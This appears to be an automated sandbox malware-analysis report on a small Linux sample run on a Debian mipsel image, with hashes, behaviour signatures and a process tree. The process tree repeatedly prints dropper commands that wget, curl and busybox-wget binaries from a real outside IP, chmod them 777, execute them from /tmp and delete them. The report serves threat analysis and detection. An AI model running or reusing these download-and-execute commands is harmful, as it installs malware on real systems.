Analysis
-
max time kernel
48s -
max time network
50s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipsel image:debian9-mipsel-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/11/2024, 03:26
Static task
static1
Behavioral task
behavioral1
Sample
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
Resource
debian9-mipsel-20240418-en
General
-
Target
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
-
Size
10KB
-
MD5
15e750247f2724d961a7f702afe120f0
-
SHA1
887ce46a3f6cb1d6488b9d07ef0cbdb6f34790d8
-
SHA256
66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41
-
SHA512
2c0737cc90e138cf6f5664efe3a4c346818e19faa3457e7512cb785bc8df9682b2ac3e80efbe2a0d61b5bd5ad28e98b840686691a89ee2105ff75bbf2b14dc7a
-
SSDEEP
192:mDHJ7DHy7jn+771ds5ZxYIf7jnHwgpwZ5YwJp674o/amP08Ea1y1+1D0845ZBDH+:W6+7SXrIhof
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N/tmp/66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N1⤵PID:720
-
/bin/rm/bin/rm bins.sh2⤵PID:726
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:732
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:749
-
-
/bin/chmodchmod 777 hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND./hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:756
-
-
/bin/chmodchmod 777 noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY./noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:789
-
-
/bin/chmodchmod 777 BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY./BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:814
-
-
/bin/chmodchmod 777 j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61./j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:822
-
-
/bin/chmodchmod 777 izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk./izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:829
-
-
/bin/chmodchmod 777 vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o./vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:844
-
-
/bin/chmodchmod 777 AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj./AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:865
-
-
/bin/chmodchmod 777 fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4./fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:880
-
-
/bin/chmodchmod 777 cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy./cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:887
-
-
/bin/chmodchmod 777 nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309./nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:894
-
-
/bin/chmodchmod 777 J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs./J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:901
-
-
/bin/chmodchmod 777 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1./2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:911
-
-
/bin/chmodchmod 777 Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp./Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:918
-
-
/bin/chmodchmod 777 shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA./shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:925
-
-
/bin/chmodchmod 777 izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk./izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:932
-
-
/bin/chmodchmod 777 hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND./hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm hJacOX0JDY6JLwyURGHzxPUklQMfel7nND2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:939
-
-
/bin/chmodchmod 777 noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY./noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:946
-
-
/bin/chmodchmod 777 BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY./BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY2⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:953
-
-
/bin/chmodchmod 777 j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61./j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT612⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:960
-
-
/bin/chmodchmod 777 vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o./vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:967
-
-
/bin/chmodchmod 777 AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj./AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:974
-
-
/bin/chmodchmod 777 fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4./fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:981
-
-
/bin/chmodchmod 777 cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy./cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:985
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:986
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:988
-
-
/bin/chmodchmod 777 nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309./nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:992
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:993
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:995
-
-
/bin/chmodchmod 777 J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs./J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:999
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1000
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1002
-
-
/bin/chmodchmod 777 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1./2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1006
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1007
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1009
-
-
/bin/chmodchmod 777 Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp./Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1013
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1014
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1016
-
-
/bin/chmodchmod 777 shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA./shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
114B
MD5
546071c6a6aeff34580b4d1a9b35a7c3
SHA1
dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256
2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512
207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7